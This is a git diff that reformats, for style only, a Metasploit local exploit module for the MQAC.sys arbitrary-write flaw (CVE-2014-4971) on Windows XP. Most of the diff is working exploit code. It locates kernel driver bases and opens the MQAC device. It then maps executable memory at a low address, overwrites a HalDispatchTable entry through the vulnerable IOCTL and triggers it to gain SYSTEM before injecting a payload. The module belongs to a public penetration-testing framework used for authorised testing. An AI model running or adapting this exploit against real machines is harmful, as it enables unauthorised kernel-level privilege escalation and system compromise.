Merge rubocop changes from Kernelsmith
commit
f3e8c51573
|
@ -15,15 +15,15 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
INVALID_HANDLE_VALUE = 0xFFFFFFFF
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info, {
|
||||
super(update_info(info,
|
||||
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
|
||||
'Description' => %q{
|
||||
'Description' => %q(
|
||||
A vulnerability within the MQAC.sys module allows an attacker to
|
||||
overwrite an arbitrary location in kernel memory.
|
||||
|
||||
This module will elevate itself to SYSTEM, then inject the payload
|
||||
into another SYSTEM process.
|
||||
},
|
||||
),
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'SessionTypes' => ['meterpreter'],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -46,30 +46,38 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'_UPID' => "\x84",
|
||||
'_APLINKS' => "\x88"
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4971' ],
|
||||
[ 'EDB', '34112' ],
|
||||
%w(CVE 2014-4971),
|
||||
%w(EDB 34112),
|
||||
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt']
|
||||
],
|
||||
'DisclosureDate' => 'Jul 22 2014',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
))
|
||||
end
|
||||
|
||||
def find_sys_base(drvname)
|
||||
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ['PBLOB', 'lpImageBase', 'out'], ['DWORD', 'cb', 'in'], ['PDWORD', 'lpcbNeeded', 'out']])
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ['LPVOID', 'ImageBase', 'in'], ['PBLOB', 'lpBaseName', 'out'], ['DWORD', 'nSize', 'in']])
|
||||
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
|
||||
lp_image_base = %w(PBLOB lpImageBase out)
|
||||
cb = %w(DWORD cb in)
|
||||
lpcb_needed = %w(PDWORD lpcbNeeded out)
|
||||
session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL',
|
||||
[lp_image_base, cb, lpcb_needed])
|
||||
image_base = %w(LPVOID ImageBase in)
|
||||
lp_base_name = %w(PBLOB lpBaseName out)
|
||||
n_size = %w(DWORD nSize in)
|
||||
session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD',
|
||||
[image_base, lp_base_name, n_size])
|
||||
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
|
||||
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('L*')
|
||||
|
||||
addresses.each do |address|
|
||||
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
|
||||
current_drvname = results['lpBaseName'][0..results['return'] - 1]
|
||||
if drvname == nil
|
||||
if drvname.nil?
|
||||
if current_drvname.downcase.include?('krnl')
|
||||
return [address, current_drvname]
|
||||
end
|
||||
|
@ -99,12 +107,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def open_device
|
||||
handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
|
||||
if handle['return'] == 0
|
||||
handle = session.railgun.kernel32.CreateFileA('\\\\.\\MQAC',
|
||||
'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, nil, 'OPEN_EXISTING', 0, nil)
|
||||
handle = handle['return']
|
||||
if handle == 0
|
||||
print_error('Failed to open the \\\\.\\MQAC device')
|
||||
return nil
|
||||
end
|
||||
handle = handle['return']
|
||||
handle
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -141,8 +151,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return
|
||||
end
|
||||
|
||||
# Running on Windows XP versions that aren't listed in the supported list results
|
||||
# in a BSOD and so we should not let that happen.
|
||||
# Running on Windows XP versions that aren't listed in the supported list
|
||||
# results in a BSOD and so we should not let that happen.
|
||||
return unless check == Exploit::CheckCode::Appears
|
||||
|
||||
kernel_info = find_sys_base(nil)
|
||||
|
@ -154,7 +164,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
this_proc = session.sys.process.open
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack('L'), nil, [ 0xffff ].pack('L'), 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE')
|
||||
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [1].pack('L'), nil,
|
||||
[0xffff].pack('L'),
|
||||
'MEM_COMMIT|MEM_RESERVE',
|
||||
'PAGE_EXECUTE_READWRITE')
|
||||
end
|
||||
unless this_proc.memory.writable?(base_addr)
|
||||
print_error('Failed to properly allocate memory')
|
||||
|
@ -164,7 +177,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
|
||||
hKernel = hKernel['return']
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
|
||||
halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel,
|
||||
'HalDispatchTable')
|
||||
halDispatchTable = halDispatchTable['return']
|
||||
halDispatchTable -= hKernel
|
||||
halDispatchTable += kernel_info[0]
|
||||
|
@ -193,8 +207,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
this_proc.close
|
||||
|
||||
print_status('Triggering vulnerable IOCTL')
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
|
||||
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f,
|
||||
1, 0x258,
|
||||
halDispatchTable + 0x4, 0)
|
||||
session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
|
||||
|
||||
unless is_system?
|
||||
print_error('Exploit failed')
|
||||
|
@ -207,5 +223,4 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Failure::Unknown, 'Error while executing the payload')
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue